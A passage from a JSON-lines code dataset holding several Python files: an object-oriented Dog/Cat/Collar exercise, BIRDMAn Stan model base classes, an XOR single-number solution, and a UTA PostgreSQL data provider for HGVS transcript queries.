classes to\r\nhave instances of classes as variables as well. If we pass in an object into the constructor of another class for it to\r\nbe stored, it is called aggregation. Suppose that an instance of 'Dog' is given a 'Collar' object. Then the relationship\r\nbetween the two objects would be that \"the Dog HAS A Collar.\"\r\n\r\nIn this activity, we will be implementing a class called Collar that will store an owner's name, a phone-number, and an \r\naddress. It should also have a 'getInfo' method that should be called within the Dog or Cat's 'getInfo' methods if\r\nthere is a collar present. This will require you to revise your Dog and Cat classes. I'd suggest using optional\r\nparameter values.\r\n'''\r\n\r\ncollar1 = Collar(\"Alex\", \"635-474-3383\", \"2054 Panama Lane\")\r\ncollar2 = Collar(\"Bethany\", \"293-555-0875\", \"695 Lazuli Road\")\r\n\r\n\r\ndog1 = Dog(\"gold\", 7, ['sit', 'lay', 'rollover'], \"golden retriever\", \"ball\", collar1)\r\ndog2 = Dog(\"black\", 4, ['shake', 'speak'], \"toy poodle\", \"sock\", collar2)\r\n\r\ncat1 = Cat(\"gray\", 9, 8, \"russian blue\", \"chicken\", collar1)\r\ncat2 = Cat(\"brown\", 6, 12, \"maine coon\", \"fish\")\r\n\r\ndog1.getInfo()\r\ncat1.getInfo()\r\ndog2.getInfo()\r\ncat2.getInfo()\r\n","sub_path":"Week7/activity3.py","file_name":"activity3.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"80610211","text":"from abc import ABC, abstractmethod\nfrom math import ceil\nfrom typing import Sequence\nimport warnings\n\nimport arviz as az\nimport biom\nfrom cmdstanpy import CmdStanModel\nimport pandas as pd\nfrom patsy import dmatrix\n\nfrom .model_util import full_fit_to_inference, single_feature_fit_to_inference\n\n\nclass BaseModel(ABC):\n \"\"\"Base BIRDMAn model.\n\n :param table: Feature table (features x samples)\n :type table: biom.table.Table\n\n :param model_path: Filepath to Stan model\n :type model_path: str\n\n :param num_iter: Number of posterior sample draws, defaults to 500\n :type num_iter: int\n\n :param num_warmup: Number of posterior draws used for warmup, defaults to\n num_iter\n :type num_warmup: int\n\n :param chains: Number of chains to use in MCMC, defaults to 4\n :type chains: int\n\n :param seed: Random seed to use for sampling, defaults to 42\n :type seed: float\n \"\"\"\n def __init__(\n self,\n table: biom.table.Table,\n model_path: str,\n num_iter: int = 500,\n num_warmup: int = None,\n chains: int = 4,\n seed: float = 42,\n ):\n self.num_iter = num_iter\n if num_warmup is None:\n self.num_warmup = num_iter\n else:\n self.num_warmup = num_warmup\n self.chains = chains\n self.seed = seed\n self.sample_names = table.ids(axis=\"sample\")\n self.model_path = model_path\n self.sm = None\n self.fit = None\n\n self.dat = {\n \"D\": table.shape[0], # number of features\n \"N\": table.shape[1], # number of samples\n }\n\n self.specified = False\n\n def create_regression(self, formula: str, metadata: pd.DataFrame):\n \"\"\"Generate design matrix for count regression modeling.\n\n :param formula: Design formula to use in model\n :type formula: str\n\n :param metadata: Metadata for design matrix\n :type metadata: pd.DataFrame\n \"\"\"\n self.dmat = dmatrix(formula, metadata.loc[self.sample_names],\n return_type=\"dataframe\")\n self.colnames = self.dmat.columns\n\n param_dict = {\n \"p\": self.dmat.shape[1],\n \"x\": self.dmat.values,\n }\n self.add_parameters(param_dict)\n\n def compile_model(self):\n \"\"\"Compile Stan model.\"\"\"\n self.sm = CmdStanModel(stan_file=self.model_path)\n\n def specify_model(\n self,\n params: Sequence[str],\n coords: dict,\n dims: dict,\n include_observed_data: bool = False,\n posterior_predictive: str = None,\n log_likelihood: str = None,\n **kwargs,\n ):\n \"\"\"Specify coordinates and dimensions of model.\n\n :param params: Posterior fitted parameters to include\n :type params: Sequence[str]\n\n :param coords: Mapping of entries in dims to labels\n :type coords: dict\n\n :param dims: Dimensions of parameters in the model\n :type dims: dict\n\n :param include_observed_data: Whether to include the original feature\n table values into the ``arviz`` InferenceData object, default is\n False\n :type include_observed_data: bool\n\n :param posterior_predictive: Name of posterior predictive values from\n Stan model to include in ``arviz`` InferenceData object\n :type posterior_predictive: str, optional\n\n :param log_likelihood: Name of log likelihood values from Stan model\n to include in ``arviz`` InferenceData object\n :type log_likelihood: str, optional\n\n :param kwargs: Extra keyword arguments to save in specifications dict\n \"\"\"\n self.params = params\n self.coords = coords\n self.dims = dims\n self.include_observed_data = include_observed_data\n self.posterior_predictive = posterior_predictive\n self.log_likelihood = log_likelihood\n self.specifications = kwargs\n\n self.specified = True\n\n def add_parameters(self, param_dict: dict = None):\n \"\"\"Add parameters from dict to be passed to Stan.\"\"\"\n if param_dict is None:\n param_dict = dict()\n self.dat.update(param_dict)\n\n def fit_model(\n self,\n sampler_args: dict = None,\n convert_to_inference: bool = False\n ):\n \"\"\"Fit Stan model.\n\n :param sampler_args: Additional parameters to pass to CmdStanPy\n sampler (optional)\n :type sampler_args: dict\n\n :param convert_to_inference: Whether to automatically convert to\n inference given model specifications, defaults to False\n :type convert_to_inference: bool\n \"\"\"\n if sampler_args is None:\n sampler_args = dict()\n\n _fit = self.sm.sample(\n chains=self.chains,\n parallel_chains=self.chains,\n data=self.dat,\n iter_warmup=self.num_warmup,\n iter_sampling=self.num_iter,\n seed=self.seed,\n **sampler_args\n )\n\n self.fit = _fit\n\n # If auto-conversion fails, fit will be of type CmdStanMCMC\n if convert_to_inference:\n try:\n self.fit = self.to_inference()\n except Exception as e:\n warnings.warn(\n \"Auto conversion to InferenceData has failed! fit has \"\n \"been saved as CmdStanMCMC instead. See error message\"\n f\": \\n{type(e).__name__}: {e}\",\n category=UserWarning\n )\n\n @abstractmethod\n def to_inference(self):\n \"\"\"Convert fitted model to az.InferenceData.\"\"\"\n\n\nclass TableModel(BaseModel):\n \"\"\"Fit a model on the entire table at once.\"\"\"\n def __init__(self, table: biom.Table, **kwargs):\n super().__init__(table=table, **kwargs)\n self.feature_names = table.ids(axis=\"observation\")\n self.add_parameters(\n {\"y\": table.matrix_data.todense().T.astype(int)}\n )\n\n def to_inference(self) -> az.InferenceData:\n \"\"\"Convert fitted Stan model into ``arviz`` InferenceData object.\n\n :returns: ``arviz`` InferenceData object with selected values\n :rtype: az.InferenceData\n \"\"\"\n if self.fit is None:\n raise ValueError(\"Model has not been fit!\")\n\n # if already Inference, just return\n if isinstance(self.fit, az.InferenceData):\n return self.fit\n\n if not self.specified:\n raise ValueError(\"Model has not been specified!\")\n\n inference = full_fit_to_inference(\n fit=self.fit,\n params=self.params,\n coords=self.coords,\n dims=self.dims,\n posterior_predictive=self.posterior_predictive,\n log_likelihood=self.log_likelihood,\n **self.specifications\n )\n\n if self.include_observed_data:\n obs = az.from_dict(\n observed_data={\"observed\": self.dat[\"y\"]},\n coords={\n \"tbl_sample\": self.sample_names,\n \"feature\": self.feature_names\n },\n dims={\n \"observed\": [\"tbl_sample\", \"feature\"]\n }\n )\n inference = az.concat(inference, obs)\n return inference\n\n\nclass SingleFeatureModel(BaseModel):\n \"\"\"Fit a model for a single feature.\"\"\"\n def __init__(self, table: biom.Table, feature_id: str, **kwargs):\n super().__init__(table=table, **kwargs)\n self.feature_id = feature_id\n values = table.data(\n id=feature_id,\n axis=\"observation\",\n dense=True\n ).astype(int)\n self.add_parameters({\"y\": values})\n\n def to_inference(self) -> az.InferenceData:\n \"\"\"Convert fitted Stan model into ``arviz`` InferenceData object.\n\n :returns: ``arviz`` InferenceData object with selected values\n :rtype: az.InferenceData\n \"\"\"\n if self.fit is None:\n raise ValueError(\"Model has not been fit!\")\n\n # if already Inference, just return\n if isinstance(self.fit, az.InferenceData):\n return self.fit\n\n if not self.specified:\n raise ValueError(\"Model has not been specified!\")\n\n inference = single_feature_fit_to_inference(\n fit=self.fit,\n params=self.params,\n coords=self.coords,\n dims=self.dims,\n posterior_predictive=self.posterior_predictive,\n log_likelihood=self.log_likelihood,\n **self.specifications\n )\n\n if self.include_observed_data:\n obs = az.from_dict(\n observed_data={\"observed\": self.dat[\"y\"]},\n coords={\"tbl_sample\": self.sample_names},\n dims={\"observed\": [\"tbl_sample\"]}\n )\n inference = az.concat(inference, obs)\n return inference\n\n\nclass ModelIterator:\n \"\"\"Iterate through features in a table.\n\n This class is intended for those looking to parallelize model fitting\n across individual features rather than across Markov chains.\n\n :param table: Feature table (features x samples)\n :type table: biom.table.Table\n\n :param model: BIRDMAn model for each individual feature\n :type model: birdman.model_base.SingleFeatureModel\n\n :param num_chunks: Number of chunks to split table features. By default\n does not do any chunking.\n :type num_chunks: int\n\n :param kwargs: Keyword arguments to pass to each feature model\n \"\"\"\n def __init__(\n self,\n table: biom.Table,\n model: SingleFeatureModel,\n num_chunks: int = None,\n **kwargs\n ):\n self.feature_names = list(table.ids(axis=\"observation\"))\n self.size = table.shape[0]\n self.model_type = model\n self.num_chunks = num_chunks\n models = [model(table, fid, **kwargs) for fid in self.feature_names]\n\n if num_chunks is None:\n self.chunks = list(zip(self.feature_names, models))\n else:\n chunk_size = ceil(self.size / num_chunks)\n self.chunks = []\n for i in range(0, self.size, chunk_size):\n chunk_feature_names = self.feature_names[i: i+chunk_size]\n chunk_models = models[i: i+chunk_size]\n\n chunk = [\n (fid, _model) for fid, _model\n in zip(chunk_feature_names, chunk_models)\n ]\n self.chunks.append(chunk)\n\n def __iter__(self):\n return (chunk for chunk in self.chunks)\n\n def __getitem__(self, chunk_idx: int):\n return self.chunks[chunk_idx]\n\n def __len__(self):\n return self.num_chunks\n","sub_path":"birdman/model_base.py","file_name":"model_base.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"22183744","text":"'''\nInput: a List of integers where every int except one shows up twice\nReturns: an integer\n'''\n\n\ndef single_number(arr):\n '''\n my_list = []\n for i in arr:\n if i in my_list:\n my_list.remove(i)\n else:\n my_list.append(i)\n return my_list.pop()\n '''\n\n '''\n XOR \"exclusive or\" operator ^\n O(1)\n\n a | b | a ^ b\n --|---|------\n 0 | 0 | 0\n 0 | 1 | 1\n 1 | 0 | 1\n 1 | 1 | 0\n\n Example: 7 ^ 10\n In binary: 0111 ^ 1010\n 0111\n ^ 1010\n ======\n 1101 = 13\n\n Example 2:\n 10 ^ 5\n >> 15\n 15 ^ 5\n >> 10\n\n '''\n\n a = 0\n for i in arr:\n a ^= i\n return a\n\n\nif __name__ == '__main__':\n # Use the main function to test your implementation\n arr = [1, 4, 1, 4, 5, 3, 3, 7, 9, 5, 7]\n\n print(f\"The odd-number-out is {single_number(arr)}\")\n","sub_path":"single_number/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221990816","text":"# -*- coding: utf-8 -*-\n\"\"\"implements an vvhgvs data provider interface using UTA\n(https://github.com/biocommons/uta)\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport contextlib\nimport inspect\nimport logging\nimport os\nimport re\n\nimport psycopg2\nimport psycopg2.extras\nimport psycopg2.pool\n\nfrom bioutils.assemblies import make_ac_name_map\nfrom bioutils.digests import seq_md5\nfrom six.moves.urllib import parse as urlparse\n\nimport vvhgvs\nfrom ..dataproviders.interface import Interface\nfrom ..exceptions import HGVSError, HGVSDataNotAvailableError\nfrom .seqfetcher import SeqFetcher\nimport six\n\n_logger = logging.getLogger(__name__)\n\n\ndef _stage_from_version(version):\n \"\"\"return \"prd\", \"stg\", or \"dev\" for the given version string. A value is always returned\"\"\"\n if version:\n m = re.match(r\"^(?P\\d+\\.\\d+\\.\\d+)(?P.*)\", version)\n if m:\n return \"stg\" if m.group(\"extra\") else \"prd\"\n return \"dev\"\n\n\ndef _get_uta_db_url():\n \"\"\"returns UTA DB URL based on environment variables and code version\n\n * if UTA_DB_URL is set, use that\n * Otherwise, if _UTA_URL_KEY is set, use that as the name of a\n config file entry and use the corresponding URL\n * Otherwise, \n\n \"\"\"\n\n if \"UTA_DB_URL\" in os.environ:\n return os.environ[\"UTA_DB_URL\"]\n\n if \"_UTA_URL_KEY\" in os.environ:\n url_key = os.environ[\"_UTA_URL_KEY\"]\n else:\n quit(\"\"\"\n V.V. usage can be quite heavy, variant validators \"test_configuration.py\" asserts that we \n should at least explicitly chose the location, therefore, for vvhgvs, disable silent public \n fallback, explicitly set a external url key if remote data is needed.\n \"\"\")\n sdlc = _stage_from_version(vvhgvs.__version__)\n url_key = \"public_{sdlc}\".format(sdlc=sdlc)\n return vvhgvs.global_config['uta'][url_key]\n\n\ndef connect(db_url=None, pooling=vvhgvs.global_config.uta.pooling, application_name=None, mode=None, cache=None):\n \"\"\"Connect to a UTA database instance and return a UTA interface instance.\n\n :param db_url: URL for database connection\n :type db_url: string\n :param pooling: whether to use connection pooling (postgresql only)\n :type pooling: bool\n :param application_name: log application name in connection (useful for debugging; PostgreSQL only)\n :type application_name: str\n\n When called with an explicit db_url argument, that db_url is used for connecting.\n\n When called without an explicit argument, the function default is\n determined by the environment variable UTA_DB_URL if it exists, or\n vvhgvs.datainterface.uta.public_db_url otherwise.\n\n >>> hdp = connect()\n >>> hdp.schema_version()\n '1.1'\n\n The format of the db_url is driver://user:pass@host/database/schema (the same\n as that used by SQLAlchemy). Examples:\n\n A remote public postgresql database:\n postgresql://anonymous:anonymous@uta.biocommons.org/uta/uta_20170707'\n\n A local postgresql database:\n postgresql://localhost/uta_dev/uta_20170707\n\n For postgresql db_urls, pooling=True causes connect to use a\n psycopg2.pool.ThreadedConnectionPool.\n \"\"\"\n\n _logger.debug('connecting to ' + str(db_url) + '...')\n\n if db_url is None:\n db_url = _get_uta_db_url()\n\n url = _parse_url(db_url)\n if url.scheme == 'postgresql':\n conn = UTA_postgresql(url=url, pooling=pooling, application_name=application_name, mode=mode, cache=cache)\n else:\n # fell through connection scheme cases\n raise RuntimeError(\"{url.scheme} in {url} is not currently supported\".format(url=url))\n _logger.info('connected to ' + str(db_url) + '...')\n return conn\n\n\nclass UTABase(Interface):\n required_version = \"0.9\"\n version_type = 'matview_version'\n # for the id quires we need at least uta 1.1 and vvta ver 0.6+ \n # but no way to specify simply, without breaking whole set on lower ver num\n _queries = {\n \"acs_for_protein_md5\":\"select ac from seq_anno where seq_id=%s\",\n \"gene_info\":\"select * from gene where hgnc=%s\",\n \"gene_info_by_id\":\"select * from gene where hgnc_id=%s\",\n # to get alias (or prev symbol from alias column) use LIKE for\n # now. 'SIMILAR TO' tests slower, and like regex it has\n # safety issues \"= ANY (string_to_array(aliases,','))\" is the\n # same, if a little slower. If we split first and store as\n # array is 1/4 quicker, and does not have the problem of\n # having to repeat the input\n 'gene_info_by_alias_symbol':'''\n SELECT *\n FROM gene\n WHERE\n aliases = %s\n OR aliases LIKE %s || ',%%'\n OR aliases LIKE '%%,' || %s || ',%%'\n OR aliases LIKE '%%,' || %s\n ''',\n # TODO: reconcile tx_exons query and build_tx_cigar\n # built_tx_cigar says it expects exons in transcript order, but this is genomic order.\n \"tx_exons\":\"\"\"\n select tx_ac, alt_ac,alt_aln_method,alt_strand,ord,tx_start_i,tx_end_i,alt_start_i,alt_end_i,cigar\n from tx_exon_aln_mv where tx_ac=%s and alt_ac=%s and alt_aln_method=%s \n order by alt_start_i\n \"\"\",\n # This query should replace tx_exons in all new code, it is pre checked and should be a faster lookup vs\n # the list of results from tx_exons, at least for things like strand, the arrays are transcript order.\n # This contains extra details not used in the uta so that caching will prevent repeated lookups when \n # this data is used by variant validator.\n \"agg_exon_aln\":\"\"\"\n SELECT \n alt_strand,mapped_start,not_quite_cigar,mapped_end,\n cds_start_i, cds_end_i,\n transcript_exon_start_end,mapped_exon_start_end\n FROM full_tx_aln_w_nq_cigar_mv\n WHERE tx_ac=%s and alt_ac=%s and alt_aln_method=%s\n \"\"\",\n\n \"tx_for_gene\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from current_valid_mapped_transcript_per_gene_mv where hgnc=%s\n \"\"\",\n \"tx_for_gene_id\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from current_valid_mapped_transcript_per_gene_mv where hgnc_id=%s\n \"\"\",\n \"tx_for_region\":\"\"\"\n select tx_ac,alt_ac,alt_strand,alt_aln_method,start_i,end_i\n from current_valid_mapped_transcript_spans_mv \n where alt_ac=%s and alt_aln_method=%s and start_i < %s and %s <= end_i\n \"\"\",\n \"tx_limits\":\"\"\"\n SELECT ac, cds_start_i, cds_end_i, length, hgnc\n FROM transcript_lengths_mv\n WHERE ac=%s\n \"\"\",\n # compat query for old tx_identity_info will work with numeric indexing\n \"tx_identity_info\":\"\"\"\n SELECT ac as tx_ac, NULL AS alt_ac, NULL AS alt_aln_method, cds_start_i, cds_end_i, ARRAY[length] AS lengths, hgnc\n FROM transcript_lengths_mv\n WHERE ac=%s\n \"\"\",\n \"tx_info\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from all_mapped_transcript_mv\n where tx_ac=%s and alt_ac=%s and alt_aln_method=%s\n \"\"\",\n \"tx_mapping_options\": \"\"\"\n select distinct tx_ac,alt_ac,alt_aln_method \n from tx_exon_aln_mv where tx_ac=%s and cigar is not NULL\n \"\"\",\n \"tx_seq\":\"select seq from seq S join seq_anno SA on S.seq_id=SA.seq_id where ac=%s\",\n \"tx_similar\":\"select * from tx_similarity_v where tx_ac1 = %s\",\n \"tx_to_pro\":\"select * from associated_accessions where tx_ac = %s order by pro_ac desc\",\n }\n\n def __init__(self, url, mode=None, cache=None):\n self.url = url\n self.seqfetcher = SeqFetcher()\n if mode != 'run':\n self._connect()\n super(UTABase, self).__init__(mode, cache)\n\n def __str__(self):\n return (\"{n} \").format(\n n=type(self).__name__,\n self=self,\n dv=self.data_version(),\n sv=self.schema_version(),\n sf=os.environ.get(\"HGVS_SEQREPO_DIR\", \"seqfetcher\"))\n\n def _fetchone(self, sql, *args):\n with self._get_cursor() as cur:\n cur.execute(sql, *args)\n return cur.fetchone()\n\n def _fetchall(self, sql, *args):\n with self._get_cursor() as cur:\n cur.execute(sql, *args)\n return cur.fetchall()\n\n ############################################################################\n # Queries\n\n def data_version(self):\n return self.url.schema\n\n def schema_version(self):\n return self._fetchone(f\"select * from meta where key = '{self.version_type}'\")['value']\n\n def get_seq(self, ac, start_i=None, end_i=None):\n return self.seqfetcher.fetch_seq(ac, start_i, end_i)\n\n def get_acs_for_protein_seq(self, seq):\n \"\"\"\n returns a list of protein accessions for a given sequence. The\n list is guaranteed to contain at least one element with the\n MD5-based accession (MD5_01234abc...def56789) at the end of the\n list.\n \"\"\"\n md5 = seq_md5(seq)\n return [r['ac'] for r in self._fetchall(self._queries['acs_for_protein_md5'], [md5])] + ['MD5_' + md5]\n\n def get_gene_info(self, gene):\n \"\"\"\n returns basic information about the gene.\n\n :param gene: HGNC gene name\n :type gene: str\n\n # database results\n hgnc | ATM\n maploc | 11q22-q23\n descr | ataxia telangiectasia mutated\n summary | The protein encoded by this gene belongs to the PI3/PI4-kinase family. This...\n aliases | AT1,ATA,ATC,ATD,ATE,ATDC,TEL1,TELO1\n added | 2014-02-04 21:39:32.57125\n\n \"\"\"\n return self._fetchone(self._queries['gene_info'], [gene])\n #same as above but by id not symbol\n def get_gene_info_by_id(self, gene_id):\n return self._fetchone(self._queries['gene_info_by_id'], [gene_id])\n def get_gene_info_by_alias(self, gene_alias):\n return self._fetchall(\n self._queries['gene_info_by_alias_symbol'],\n [gene_alias,gene_alias,gene_alias,gene_alias]\n )\n\n def get_tx_exons(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"\n return transcript exon info for supplied accession (tx_ac, alt_ac, alt_aln_method), or None if not found\n\n :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n :type tx_ac: str\n\n :param alt_ac: specific genomic sequence (e.g., NC_000011.4)\n :type alt_ac: str\n\n :param alt_aln_method: sequence alignment method (e.g., splign, blat)\n :type alt_aln_method: str\n\n # tx_exons = db.get_tx_exons('NM_199425.2', 'NC_000020.10', 'splign')\n # len(tx_exons)\n 3\n\n tx_exons have the following attributes::\n\n {\n 'tes_exon_set_id' : 98390\n 'aes_exon_set_id' : 298679\n 'tx_ac' : 'NM_199425.2'\n 'alt_ac' : 'NC_000020.10'\n 'alt_strand' : -1\n 'alt_aln_method' : 'splign'\n 'ord' : 2\n 'tx_exon_id' : 936834\n 'alt_exon_id' : 2999028\n 'tx_start_i' : 786\n 'tx_end_i' : 1196\n 'alt_start_i' : 25059178\n 'alt_end_i' : 25059588\n 'cigar' : '410='\n }\n\n For example:\n\n # tx_exons[0]['tx_ac']\n 'NM_199425.2'\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_exons'], [tx_ac, alt_ac, alt_aln_method])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\n \"No tx_exons for (tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n\n # TODO: Check that end == transcript sequence length (but length N/A in current hdp)\n ex0 = 0 if (rows[0][\"alt_strand\"] == 1) else -1\n if rows[ex0][\"tx_start_i\"] != 0:\n raise HGVSDataNotAvailableError(\"Alignment is incomplete; cannot use transcript for mapping\"\n \"(tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n return rows\n\n def get_agg_exon_aln(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"\n return transcript alignment details for supplied (tx_ac, alt_ac, alt_aln_method), or None if not found\n pre-filtered for start =0 and contiguousness \n return order = strand,cigar start offset, not quite cigar format alignment,mapped end pos,\n cds start,cds end,exon pos sets, exon mapping pos sets\n \"\"\"\n return self._fetchone(self._queries['agg_exon_aln'], [tx_ac, alt_ac, alt_aln_method])\n\n\n def get_tx_for_gene(self, gene):\n \"\"\"\n return transcript info records for supplied gene, in order of decreasing length\n\n :param gene: HGNC gene name\n :type gene: str\n \"\"\"\n return self._fetchall(self._queries['tx_for_gene'], [gene])\n #same as above but by id not symbol\n def get_tx_for_gene_id(self, gene_id):\n return self._fetchall(self._queries['tx_for_gene_id'], [gene_id])\n\n def get_tx_for_region(self, alt_ac, alt_aln_method, start_i, end_i):\n \"\"\"\n return transcripts that overlap given region\n\n :param str alt_ac: reference sequence (e.g., NC_000007.13)\n :param str alt_aln_method: alignment method (e.g., splign)\n :param int start_i: 5' bound of region\n :param int end_i: 3' bound of region\n \"\"\"\n return self._fetchall(self._queries['tx_for_region'], [alt_ac, alt_aln_method, start_i, end_i])\n\n def get_tx_identity_info(self, tx_ac):\n \"\"\"returns features associated with a single transcript.\n\n :param tx_ac: transcript accession with version (e.g., 'NM_199425.2')\n :type tx_ac: str\n\n # database output\n -[ RECORD 1 ]--+-------------\n tx_ac | NM_199425.2\n alt_ac | NM_199425.2\n alt_aln_method | transcript\n cds_start_i | 283\n cds_end_i | 1003\n lengths | {707,79,410}\n hgnc | VSX1\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_identity_info'], [tx_ac])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\"No transcript definition for (tx_ac={tx_ac})\".format(tx_ac=tx_ac))\n return rows[0]\n def get_tx_limits(self, tx_ac):\n \"\"\"returns gene symbol and non alignment derived transcript features associated with a single transcript.\n same as get_tx_identity_info but,\n does not generate dummy values for alt_ac and method \n does not wrap transcript length as lengths in array\n ac,cds_start_i,cds_end_i,length,hgnc\n \"\"\"\n rows = self._fetchall(self._queries['tx_limits'], [tx_ac])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\"No transcript definition for (tx_ac={tx_ac})\".format(tx_ac=tx_ac))\n return rows[0]\n \n def get_tx_info(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"return a single transcript info for supplied accession (tx_ac, alt_ac, alt_aln_method), or None if not found\n\n :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n :type tx_ac: str\n\n :param alt_ac: specific genomic sequence (e.g., NC_000011.4)\n :type alt_ac: str\n\n :param alt_aln_method: sequence alignment method (e.g., splign, blat)\n :type alt_aln_method: str\n\n # database output\n -[ RECORD 1 ]--+------------\n hgnc | ATM\n cds_start_i | 385\n cds_end_i | 9556\n tx_ac | NM_000051.3\n alt_ac | AC_000143.1\n alt_aln_method | splign\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_info'], [tx_ac, alt_ac, alt_aln_method])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\n \"No tx_info for (tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n elif len(rows) == 1:\n return rows[0]\n else:\n raise HGVSError(\"Multiple ({n}) replies for tx_info(tx_ac=\"\n \"{tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n n=len(rows), tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n\n def get_tx_mapping_options(self, tx_ac):\n \"\"\"Return all transcript alignment sets for a given transcript\n accession (tx_ac); returns empty list if transcript does not\n exist. Use this method to discovery possible mapping options\n supported in the database\n\n :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n :type tx_ac: str\n\n # database output\n -[ RECORD 1 ]--+------------\n hgnc | ATM\n cds_start_i | 385\n cds_end_i | 9556\n tx_ac | NM_000051.3\n alt_ac | AC_000143.1\n alt_aln_method | splign\n -[ RECORD 2 ]--+------------\n hgnc | ATM\n cds_start_i | 385\n cds_end_i | 9556\n tx_ac | NM_000051.3\n alt_ac | NC_000011.9\n alt_aln_method | blat\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_mapping_options'], [tx_ac])\n return rows\n\n def get_similar_transcripts(self, tx_ac):\n \"\"\"Return a list of transcripts that are similar to the given\n transcript, with relevant similarity criteria.\n\n >> sim_tx = hdp.get_similar_transcripts('NM_001285829.1')\n >> dict(sim_tx[0])\n { 'cds_eq': False,\n 'cds_es_fp_eq': False,\n 'es_fp_eq': True,\n 'tx_ac1': 'NM_001285829.1',\n 'tx_ac2': 'ENST00000498907' }\n\n where:\n\n * cds_eq means that the CDS sequences are identical\n * es_fp_eq means that the full exon structures are identical\n (i.e., incl. UTR)\n * cds_es_fp_eq means that the cds-clipped portions of the exon\n structures are identical (i.e., ecluding. UTR)\n * Hint: \"es\" = \"exon set\", \"fp\" = \"fingerprint\", \"eq\" = \"equal\"\n\n \"exon structure\" refers to the start and end coordinates on a\n specified reference sequence. Thus, having the same exon\n structure means that the transcripts are defined on the same\n reference sequence and have the same exon spans on that\n sequence.\n\n \"\"\"\n\n rows = self._fetchall(self._queries['tx_similar'], [tx_ac])\n return rows\n\n def get_pro_ac_for_tx_ac(self, tx_ac):\n \"\"\"Return the (single) associated protein accession for a given transcript\n accession, or None if not found.\"\"\"\n\n rows = self._fetchall(self._queries['tx_to_pro'], [tx_ac])\n try:\n return rows[0]['pro_ac']\n except IndexError:\n return None\n\n def get_assembly_map(self, assembly_name):\n \"\"\"return a list of accessions for the specified assembly name (e.g., GRCh38.p5)\n\n \"\"\"\n return make_ac_name_map(assembly_name)\n\n\nclass UTA_postgresql(UTABase):\n def __init__(self, url, pooling=vvhgvs.global_config.uta.pooling, application_name=None, mode=None, cache=None):\n if url.schema is None:\n raise Exception(\"No schema name provided in {url}\".format(url=url))\n self.application_name = application_name\n self.pooling = pooling\n self._conn = None\n super(UTA_postgresql, self).__init__(url, mode, cache)\n\n def __del__(self):\n self.close()\n\n def close(self):\n if self.pooling:\n self._pool.closeall()\n else:\n if self._conn is not None:\n self._conn.close()\n\n def _connect(self):\n if self.application_name is None:\n st = inspect.stack()\n self.application_name = os.path.basename(st[-1][1])\n conn_args = dict(\n host=self.url.hostname,\n port=self.url.port,\n database=self.url.database,\n user=self.url.username,\n password=self.url.password,\n application_name=self.application_name + \"/\" + vvhgvs.__version__,\n )\n if self.pooling:\n _logger.info(\"Using UTA ThreadedConnectionPool\")\n self._pool = psycopg2.pool.ThreadedConnectionPool(vvhgvs.global_config.uta.pool_min,\n vvhgvs.global_config.uta.pool_max, **conn_args)\n else:\n self._conn = psycopg2.connect(**conn_args)\n self._conn.autocommit = True\n\n self._ensure_schema_exists()\n\n def _ensure_schema_exists(self):\n # N.B. On AWS RDS, information_schema.schemata always returns zero rows\n r = self._fetchone(\"select exists(SELECT 1 FROM pg_namespace WHERE nspname = %s)\", [self.url.schema])\n if r[0]:\n return\n raise HGVSDataNotAvailableError(\"specified schema ({}) does not exist (url={})\".format(\n self.url.schema, self.url))\n\n @contextlib.contextmanager\n def _get_cursor(self, n_retries=1):\n \"\"\"Returns a context manager for obtained from a single or pooled\n connection, and sets the PostgreSQL search_path to the schema\n specified in the connection URL.\n\n Although *connections* are threadsafe, *cursors* are bound to\n connections and are *not* threadsafe. Do not share cursors\n across threads.\n\n Use this funciton like this::\n\n with hdp._get_cursor() as cur:\n # your code\n\n Do not call this function outside a contextmanager.\n\n \"\"\"\n\n n_tries_rem = n_retries + 1\n while n_tries_rem > 0:\n try:\n\n conn = self._pool.getconn() if self.pooling else self._conn\n\n # autocommit=True obviates closing explicitly\n conn.autocommit = True\n\n cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cur.execute(\"set search_path = {self.url.schema};\".format(self=self))\n\n yield cur\n\n # contextmanager executes these when context exits\n cur.close()\n if self.pooling:\n self._pool.putconn(conn)\n\n break\n\n except psycopg2.OperationalError:\n\n _logger.warning(\"Lost connection to {url}; attempting reconnect\".format(url=self.url))\n if self.pooling:\n self._pool.closeall()\n self._connect()\n _logger.warning(\"Reconnected to {url}\".format(url=self.url))\n\n 